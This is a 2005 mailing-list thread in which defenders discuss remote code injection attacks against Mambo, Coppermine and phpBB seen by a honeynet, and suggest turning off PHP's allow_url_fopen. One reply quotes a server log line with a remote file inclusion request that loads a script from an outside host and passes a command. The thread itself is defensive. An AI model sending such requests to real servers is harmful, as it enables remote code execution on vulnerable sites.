Re: Mambo, Coppermine and PHPBB Attacks

[Jack Tennessee <jack () intoxicate me uk>]

Anyone with the analysis from philippinehoneynet.org ?
They exceeded their bandwith and i wonder if one of you kept it on file ?
thanks ;)

Tofik Suleymanov wrote:
> Paul Laudanski wrote:
>
> > On Mon, 19 Dec 2005, Mark Ryan del Moral Talabis wrote:
> >
> >  
> >
> > > Our honeynet has been picking up an increase in the number of code
> > > injection attacks in the past few days. Attacks are primarily directed
> > > to several popular open source applications: Mambo, Coppermine and
> > > PHPBB.
> > >
> > > Analysis:
> > > http://www.philippinehoneynet.org/dataarchive.php?date=2005-12-17
> > >   
> >
> >
> > Nice catch.  I checked my logs and found these which appear to be the 
> > valid phpbb injection request:
> >
> > 81.215.110.24 - - [19/Dec/2005:07:20:30 -0500] "GET 
> > /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.frauenfinanzzentrum.at/tool25.dat?&cmd=id 
> > HTTP/1.0"
> >
> > Notice the admin_styles.php is written out once.  I would suspect that 
> > disabling allow_url_fopen directive in php.ini would disallow such a 
> > request to execute.  This would prevent resources other than files to 
> > not be included.  But I haven't tested.
> >
> >  
>  From php.ini
> "Whether to allow the treatment of URLs (like http:// or ftp://) as files."
>
> In latest versions of php this option is set to secure mode of operation 
> by default (as far as i know):
> allow_url_fopen = Off
> This option prevents such type of attacks.